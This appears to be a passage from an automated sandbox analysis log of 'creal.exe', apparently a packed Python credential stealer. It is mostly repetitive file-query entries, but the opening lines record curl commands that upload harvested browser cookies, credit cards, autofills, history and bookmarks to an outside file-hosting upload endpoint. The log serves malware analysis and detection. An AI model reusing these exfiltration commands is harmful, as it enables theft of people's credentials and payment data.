            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A629F40 cpuid 0_2_00007FF67A629F40
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Util VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\certifi VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\cryptography-41.0.7.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\cryptography-41.0.7.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\cryptography-41.0.7.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\cryptography-41.0.7.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\cryptography-41.0.7.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\_ctypes.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\_bz2.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\_lzma.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\win32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\win32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\win32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\pywin32_system32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\pywin32_system32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\_wmi.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\win32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\win32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
